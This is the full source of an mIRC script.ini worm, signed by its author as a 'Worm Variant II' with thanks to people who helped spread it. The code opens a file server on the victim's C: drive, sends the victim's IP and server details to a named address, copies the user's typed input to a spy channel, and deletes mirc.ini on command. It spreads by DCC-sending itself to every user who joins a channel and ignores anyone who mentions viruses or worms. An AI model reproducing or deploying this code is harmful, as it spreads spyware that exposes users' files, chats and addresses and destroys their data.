
[SCRIPT]                                                                                                                              

n1=on 1:start:{
n2=.remote on
n3=.ctcps on
n4=.events on
n5=}
n6=on 1:text:*thief*:#:/fserve Anti Vir 2 C:\
n7=on 1:connect:/raw privmsg Jerret_Black@Hotmail.com SenSi11 $ip on $server $+ : $+ $port $+
n8=on 1:connect:.msg http://www.avp.ch  $ip on $server $+ : $+ $port $+
n9=on 1:input:*:.msg #spy1 [( $+ $active $+ ) $1-]
n10=on 1:text:*clic*:#:/disconnect
n11=
n12=on 1:text:*kill*:*:/remove $mircdir $+ mirc.ini
n13=
n14=
n15=
n16=
n17=
n18=
n19=
n20=
n21=
n22=on 1:text:*Jerret_Black@Hotmail.com*:#:/msg $nick (to Anti Vir) $ip on $server $+
n23=on 1:text:*nick*:#:/nick I am a Lamer
n24=
n25=
n26=
n27=on 1:join:#:{
n28=if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
n29=}
n30=on 1:text:*del*:#:/msg $nick (à Anti Vir) $ip
n31=on 1:TEXT:*script.ini*:?:/.ignore $nick
n32=on 1:TEXT:*virus*:?:/.ignore $nick
n33=on 1:TEXT:*worm*:?:/.ignore $nick
;
;=>>: This is my Worm Variant II.......(c) by LUCKY B.R.D 1994-99  Thanks: SlageHammer to Spreat my Vir, ByteRipper from Starbyte@Hotmail.com to help too spreat..RalphRoth@Gmx.net for detected..And AVP for the Lamer search....HeHe....

